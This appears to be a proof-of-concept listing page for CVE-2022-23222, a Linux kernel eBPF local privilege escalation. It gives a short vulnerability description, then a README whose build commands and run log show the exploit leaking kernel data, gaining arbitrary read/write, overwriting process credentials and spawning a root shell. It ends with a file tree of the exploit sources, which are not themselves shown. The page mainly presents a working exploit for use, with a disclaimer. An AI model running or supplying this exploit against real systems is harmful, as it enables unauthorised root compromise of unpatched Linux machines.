CVE-2022-23222 PoC — Linux kernel code issue vulnerability

Associated Vulnerability
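Title: Linux kernel code issue vulnerability (CVE-2022-23222)
Description: Linux kernel is the kernel used by Linux, the open-source operating system of the Linux Foundation (USA). Linux kernel 5.15.14 and earlier versions contain a code issue vulnerability that an attacker can exploit to gain privileges.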
Description
CVE-2022-23222: Linux Kernel eBPF Local Privilege Escalation
Readme
# CVE-2022-23222

Chinese writeup: https://tr3e.ee/posts/cve-2022-23222-linux-kernel-ebpf-lpe.txt

For educational/research purposes only. Use at your own risk.

## Build & Run

```bash
$ make
cc -I include -static -w -o exploit exploit.c
$ ./exploit 
[*] phase(1/8) 'create bpf map(s)' running
[+] phase(1/8) 'create bpf map(s)' done
[*] phase(2/8) 'do some leak' running
[+] phase(2/8) 'do some leak' done
[*] phase(3/8) 'prepare arbitrary rw' running
[+] phase(3/8) 'prepare arbitrary rw' done
[*] phase(4/8) 'spawn processes' running
[+] phase(4/8) 'spawn processes' done
[*] phase(5/8) 'find cred (slow)' running
[+] phase(5/8) 'find cred (slow)' done
[*] phase(6/8) 'overwrite cred' running
[+] phase(6/8) 'overwrite cred' done
[*] phase(7/8) 'spawn root shell' running
[+] Enjoy root!
# id
uid=0(root) gid=0(root) groups=65534(nobody)
# exit
[+] phase(7/8) 'spawn root shell' done
[*] phase(8/8) 'clean up the mess' running
[+] phase(8/8) 'clean up the mess' done
```
File Snapshot

```
[4.0K] /data/pocs/961e189110fc035bd1de92cc24f27c825a198967
├── [ 16K] exploit.c
├── [4.0K] include
│   ├── [ 31K] bpf.h
│   ├── [ 362] config.h
│   ├── [ 10K] debug.h
│   └── [1.9K] helper.h
├── [ 164] Makefile
└── [ 974] README.md

1 directory, 7 files
```